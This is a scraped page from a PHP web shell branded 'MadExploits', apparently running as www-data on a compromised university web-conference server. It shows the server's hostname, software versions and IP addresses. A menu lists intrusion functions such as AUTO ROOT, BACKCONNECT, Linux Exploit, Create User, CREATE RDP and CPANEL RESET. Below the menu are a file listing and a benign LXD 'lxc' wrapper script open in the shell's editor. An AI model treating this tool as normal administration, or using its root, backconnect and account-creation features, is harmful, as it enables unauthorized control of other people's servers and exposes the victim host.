Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.216.208.243
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
snap /
lxd /
29619 /
commands /
[ HOME SHELL ]
Name
Size
Permission
Action
buginfo
2.21
KB
-rwxr-xr-x
daemon.activate
3.58
KB
-rwxr-xr-x
daemon.reload
301
B
-rwxr-xr-x
daemon.start
21.9
KB
-rwxr-xr-x
daemon.stop
4.64
KB
-rwxr-xr-x
lxc
1.79
KB
-rwxr-xr-x
lxc-to-lxd
554
B
-rwxr-xr-x
lxd
1.29
KB
-rwxr-xr-x
lxd-benchmark
715
B
-rwxr-xr-x
lxd-check-kernel
232
B
-rwxr-xr-x
lxd-migrate
1.4
KB
-rwxr-xr-x
refresh
154
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lxc
#!/bin/sh set -eu # Re-exec outside of apparmor confinement if [ -d /sys/kernel/security/apparmor ] && [ "$(cat /proc/self/attr/current)" != "unconfined" ]; then exec aa-exec -p unconfined -- "$0" "$@" fi # Check if native and snap installed pid=$(ss -nlpx src "/var/lib/lxd/unix.socket" 2>/dev/null | grep "/var/lib/lxd/unix.socket" | sed -e "s/.*pid=//" -e "s/,.*//g") if [ "${pid}" -gt 0 ] 2>/dev/null; then echo "Error: Both native and snap packages are installed on this system" echo " Run \"lxd.migrate\" to complete your migration to the snap package" exit 1 fi # Fill SNAP_REAL_HOME if missing if [ -z "${SNAP_REAL_HOME:-""}" ]; then SNAP_REAL_HOME="${HOME}" if [ "${USER:-}" = "root" ] && [ -e "/root" ]; then SNAP_REAL_HOME="/root" elif [ -n "${USER:-}" ] && [ -e "/home/${USER}" ]; then SNAP_REAL_HOME="/home/${USER}" fi fi # Migrate data if needed if [ ! -d "${SNAP_USER_COMMON}/config" ]; then if [ -d "${SNAP_USER_DATA}/.config/lxc" ]; then mv "${SNAP_USER_DATA}/.config/lxc" "${SNAP_USER_COMMON}/config" || true rmdir "${SNAP_USER_DATA}/.config/" || true elif [ -d "${SNAP_REAL_HOME}/.config/lxc" ]; then cp -r "${SNAP_REAL_HOME}/.config/lxc" "${SNAP_USER_COMMON}/config" || true fi mkdir -p "${SNAP_USER_COMMON}/config" fi # Set the environment export LXD_DIR="${LXD_DIR:-"${SNAP_COMMON}/lxd/"}" export LXD_CONF="${SNAP_USER_COMMON}/config" # Use editor wrapper export EDITOR="${SNAP}/bin/editor ${EDITOR:-}" export VISUAL="${EDITOR}" # Reset all locales as it isn't available in the snap (#29) LANG=C.UTF-8 export LC_ALL=C.UTF-8 # Add extra binaries to path export PATH="/run/bin:${PATH}" LXC="lxc" if [ -x "${SNAP_COMMON}/lxc.debug" ]; then LXC="${SNAP_COMMON}/lxc.debug" fi # Run lxc itself exec "${LXC}" "$@"
Close